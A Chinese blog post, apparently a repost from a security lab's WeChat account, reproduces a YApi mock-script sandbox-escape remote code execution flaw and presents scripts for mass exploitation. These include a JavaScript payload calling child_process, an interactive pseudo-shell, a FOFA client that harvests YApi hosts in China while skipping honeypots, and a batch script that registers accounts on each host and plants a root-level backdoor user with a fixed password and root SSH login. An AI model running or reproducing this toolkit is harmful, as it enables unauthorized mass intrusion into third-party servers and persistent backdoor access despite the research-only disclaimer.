-
-
前言
-
一、漏洞复现
-
二、伪shell的编写
-
二、批量脚本 *
-
fofa.py
-
fofasearch.py
-
yapi.py
-
总结
前言
一、漏洞复现
app="yapi"
,但是为了避开国内,所以使用 app="yapi" && country="SG"
,SG为新加坡,结果如图顺便记录一下验证 docker 的两个小方法
ps -ef :docker 一般显示很少的进程
ls -a /.dockerenv
const sandbox = this
const ObjectConstructor = this.constructor
const FunctionConstructor = ObjectConstructor.constructor
const myfun = FunctionConstructor('return process')
const process = myfun()
mockJson = process.mainModule.require("child_process").execSync("whoami && ps -ef").toString()
二、伪shell的编写
# coding=utf-8
import json
import requests
url = 'http://ip:port/'
r = requests.session()
projectID = '131' # http://ip:port/project/131/interface/api/1141
interfaceID = '1141' # 131 projectID 1141 interfaceID
headers = {
'Content-Type': 'application/json'
}
def login():
data = {
"email": "[email protected]",
"password": "asd"
}
rsp = r.post(url + 'api/user/login', data=json.dumps(data), headers=headers)
print(rsp.text)
def rce(cmd): # 这里做了优化,对全局变量进行修改,需要关闭 ‘高级Mock’ 中的脚本
poc = '''const sandbox = this
const ObjectConstructor = this.constructor
const FunctionConstructor = ObjectConstructor.constructor
const myfun = FunctionConstructor('return process')
const process = myfun()
mockJson = process.mainModule.require("child_process").execSync("{}").toString()'''.format(cmd)
data = {"id": projectID, "project_mock_script": f'''const sandbox = this
const ObjectConstructor = this.constructor
const FunctionConstructor = ObjectConstructor.constructor
const myfun = FunctionConstructor('return process')
const process = myfun()
mockJson = process.mainModule.require("child_process").execSync("{cmd}").toString()''',
"is_mock_open": True}
rsp = r.post(url + 'api/project/up', data=json.dumps(data), headers=headers)
print(rsp.text)
def result():
url2 = url + f'mock/{projectID}/1/1'
rsp = r.get(url2, headers=headers)
print(rsp.text)
if __name__ == '__main__':
login()
while True:
cmd = input('$ ')
rce(cmd)
result()
二、批量脚本
提示:脚本中使用的命令可能无法正常运行,反弹shell才是永远的神。
比如我就经常遇到 useradd 不存在的报错,但是这种明显是可以执行命令的。所以请关注脚本的输出fofa.py
# -*- coding: utf-8 -*-
import base64
import json
import urllib
import urllib.error
import urllib.parse
import urllib.request
class Client:
def __init__(self, email, key):
self.email = email
self.key = key
self.base_url = "https://fofa.so"
self.search_api_url = "/api/v1/search/all"
self.login_api_url = "/api/v1/info/my"
self.get_userinfo() # check email and key
def get_userinfo(self):
api_full_url = "%s%s" % (self.base_url, self.login_api_url)
param = {"email": self.email, "key": self.key}
res = self.__http_get(api_full_url, param)
return json.loads(res)
def get_data(self, query_str, page=1, fields=""):
res = self.get_json_data(query_str, page, fields)
return json.loads(res)
def get_json_data(self, query_str, page=1, fields=""):
api_full_url = "%s%s" % (self.base_url, self.search_api_url)
param = {"qbase64": base64.b64encode(query_str), "email": self.email, "key": self.key, "page": page,
"fields": fields}
res = self.__http_get(api_full_url, param)
return res
def __http_get(self, url, param):
param = urllib.parse.urlencode(param)
url = "%s?%s" % (url, param)
try:
req = urllib.request.Request(url)
res = urllib.request.urlopen(req).read()
if b"errmsg" in res:
raise RuntimeError(res)
except urllib.error.HTTPError as e:
print("errmsg:" + e.read().decode()),
raise e
return res
fofasearch.py
import re
import fofa
class Fofa:
email = fofa_account
key = key # key 在 个人资料中
client = fofa.Client(email, key)
def __init__(self, query_str):
self.query_str = query_str
def search(self, page):
hostList = []
data = self.client.get_data(self.query_str.encode(), page=page, fields="host")
for host in data['results']:
if re.search('http
展开收缩?://', host) is None:host = 'http://' + host
if re.search('/$', host) is not None:
host = host[:-1]
hostList.append(host)
return hostList
if __name__ == '__main__':
F = Fofa('app="yapi"')
for page in range(1, 10):
print(F.search(page))
yapi.py
# coding=utf-8
import json
import sys
import requests
from fofasearch import Fofa
exp = '''const sandbox = this
const ObjectConstructor = this.constructor
const FunctionConstructor = ObjectConstructor.constructor
const myfun = FunctionConstructor('return process')
const process = myfun()
mockJson = process.mainModule.require("child_process").execSync("{}").toString()'''
class Yapi:
def __init__(self, url):
self.r = requests.session()
self.url = url
self.headers = {'Content-Type': 'application/json'}
print('nn' + '*' * 10 + url + '*' * 10)
def register(self, email, passwd, username):
data = {
"email": email,
"password": passwd,
"username": username
}
rsp = self.r.post(self.url + '/api/user/reg', data=json.dumps(data), headers=self.headers, timeout=2)
# print(rsp)
print(json.loads(rsp.text)['errmsg'])
return json.loads(rsp.text)['errmsg']
def login(self, email, passwd):
data = {
"email": email,
"password": passwd
}
rsp = self.r.post(self.url + '/api/user/login', data=json.dumps(data), headers=self.headers, timeout=2)
print(json.loads(rsp.text)['errmsg'])
return json.loads(rsp.text)['errmsg']
def getGroupId(self):
rsp = self.r.get(self.url + '/api/group/get_mygroup', timeout=2)
return json.loads(rsp.text)['data']['_id']
def addProject(self, groupid):
data = {
"name": "1",
"basepath": "/1",
"desc": "1",
"group_id": groupid,
"icon": "code-o",
"color": "pink",
"project_type": "private"
}
rsp = self.r.post(self.url + '/api/project/add', data=json.dumps(data), headers=self.headers, timeout=2)
projectId = json.loads(rsp.text)['data']['_id']
return projectId
def addInterface(self, projectID):
data = {
"method": "GET",
"catid": "112",
"title": "1",
"path": "/1",
"project_id": projectID
}
rsp = self.r.post(self.url + '/api/interface/add', data=json.dumps(data), headers=self.headers, timeout=2)
interfaceID = json.loads(rsp.text)['data']['_id']
return interfaceID
def isDocker(self, projectID):
data = {"id": projectID,
"project_mock_script": exp.format('ls -al /'),
"is_mock_open": True}
self.r.post(self.url + '/api/project/up', data=json.dumps(data), headers=self.headers, timeout=10)
def rce(self, cmd, projectID, interfaceId):
data = {"id": projectID,
"project_mock_script": exp.format(cmd),
"is_mock_open": True}
rsp = self.r.post(self.url + '/api/project/up', data=json.dumps(data), headers=self.headers)
# print(rsp.text)
def result(self, projectId):
url2 = self.url + f'/mock/{projectId}/1/1'
rsp = self.r.get(url2, headers=self.headers)
return rsp.text
def main(host, cmd='', email="[email protected]", passwd="123456", username="admin", shell=False, passDocker=False):
y = Yapi(host)
try:
regResult = y.register(email, passwd, username)
except:
print('register failed')
return
if regResult == '该email已经注册':
try:
print('try Login...')
result = y.login(email, passwd)
if result != 'logout success...':
print('login failed...')
return
except:
print('Login failed')
return
try:
groupId = y.getGroupId()
projectID = y.addProject(groupId)
print('projectID: ' + str(projectID))
interfaceID = y.addInterface(projectID)
except:
return
try:
y.isDocker(projectID)
result = y.result(projectID)
except:
print('Command execution failed')
return
if '.dockerenv' in result:
print('this is Docker')
if passDocker:
return
if shell:
while True:
cmd = input('n# ')
y.rce(cmd, projectID, interfaceID)
y.result(projectID)
else:
try:
y.rce(cmd, projectID, interfaceID)
result = y.result(projectID)
except:
print('Command execution failed')
return
if 'Invalid or unexpected token' in result:
print('Command execution failed')
elif len(result) == 0:
print('no echo')
else:
try:
print(result)
except:
print(result.encode())
if __name__ == '__main__':
query_str = '(app="yapi" && country=="CN") && (is_honeypot=false && is_fraud=false)'
cmd = '''adduser nginx1 && echo 'nginx1:Ll123@lL'|chpasswd && sed -i '$cnginx1:x:0:0:root:/root:/bin/bash' /etc/passwd && sed -i 's/#* *PermitRootLogin.*/PermitRootLogin yes/g' /etc/ssh/sshd_config && sed -i 's/#* *PasswordAuthentication.*/PasswordAuthentication yes/g' /etc/ssh/sshd_config && echo 'success' && systemctl reload ssh | systemctl reload sshd'''
# f = open('yapi.log', 'a')
# sys.stdout = f
F = Fofa(query_str)
for page in range(1, 58):
hostList = F.search(page)
for host in hostList:
try:
requests.get(host, timeout=2)
except:
print('nn' + '*'*10 + host + '*'*10)
print('connection failed')
continue
main(host, cmd)
# f.close()
Command execution failed
的有很大概率是可以执行的,但是我的命令有点问题,可以的话,师傅们能给一点修改意见嘛体验免费靶场!
本文始发于微信公众号(合天网安实验室):Yapi RCE 复现和批量编写
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论